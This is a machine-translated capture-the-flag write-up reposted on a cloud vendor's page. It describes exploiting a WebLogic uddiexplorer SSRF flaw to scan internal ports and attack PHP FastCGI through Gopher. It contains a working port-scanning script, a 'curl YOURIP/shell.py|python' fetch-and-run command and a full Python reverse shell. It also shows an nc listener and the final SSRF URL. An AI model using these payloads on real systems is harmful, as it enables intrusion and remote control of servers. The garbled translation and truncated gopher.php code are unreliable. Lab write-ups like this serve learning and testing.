Three white hats-search for you from the stars-Phase 1

Source: Internet
Author: User
Tags gopher
Three white hats-looking for you from the stars-Phase I, three white hats-looking for you from the stars-Phase I challenge introduction

I lost you from the stars. I may need to use everything I have to use to retrieve you. After two sentences are compiled, I can't make it. okay, I admit that this is the first issue of penetration.

Challenges

Http://0761e975dda0c67cb.jie.sangebaimao.com/

0x01 information collection

The opening address is a dz argument. It seems that it is not so fun, or the latest version.

Since it is completely transparent, I feel like I am offering a big poster, "Let's look at it "!(The dictionary is related)

Soon get the related information (excluding the original contents and faces of dz)

/info.php/uddiexplorer/

One is phpinfo () information, which is useful.

/opt/discuz/info.php

The other is weblogic.

Result: Baidu"Uddiexplorer vulnerability"You can now knowWeblogic uddiexplorerExistSSRFVulnerability.

This transparent relationship lies inSSRF!!!

Exploit vulnerabilities

SSRF is not only engaged in the internal network, but also combined with the docker of three white hats. 127.0.0.1 is King!

Baidu"SearchPublicRegistries ssrf vulnerability exp"

Get http://www.tuicool.com/articles/UjaqIbz

Get a notebook and modify it for use !!!

Port overview. py
#!/usr/bin/env python  # -*- coding: utf-8 -*- import reimport requestsdef scan(ip_str):    url = 'http://0761e975dda0c67cb.jie.sangebaimao.com'    ports = ('21','22','23','53','80','1080','1433','1521','3306','3389','4899','8080','7001','8000','9000','9001',)    for port in ports:        exp_url = url+"/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str, port)        try:            response = requests.get(exp_url, timeout=15, verify=False)            re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content)            re_sult2 = re.findall('but could not connect',response.content)            if len(re_sult1)!=0 and len(re_sult2)==0:                print ip_str+':'+port        except Exception, e:            passif __name__ == "__main__":    scan('127.0.0.1')

Ports 9000, 80, 3306, 7001, and are successfully cracked.

SSRF + GOPHER has always been awesome, and it has recently become increasingly popular.

Baidu ~~

Rr chicory's latest article Do edevil Things with gopher: //

0x03 attack FastCGI

Generally, FastCGI is bound to Port 127.0.0.1, but the use of Gopher + SSRF can perfectly attack FastCGI to execute arbitrary commands.

0x06 references

Remote Exploitation of PHP FastCGI

Command line

Fcgi_exp

Transportation

nc -l -p 9000 >x.txt & go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"php -f gopher.php

Save payloadto x.txt

The anti-bot shell black technology and bash anti-bot are ineffective ~~

Then urlencode uses payload to generate ssrf. php

Shell. py
import socket,subprocess,os  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.connect(("yourip",9999))  os.dup2(s.fileno(),0)  os.dup2(s.fileno(),1)  os.dup2(s.fileno(),2)  p=subprocess.call(["/bin/bash","-i"]);
Gopher. php
 ");?>

The ssrf. php file is successfully generated.

Reverse shell

VPS operation

nc -lvv 9999

Use SSRF

http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search&operator=YOURIP/ssrf.php

Anti-renewal successful ~~~

GETFLAG

Find it by yourself

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.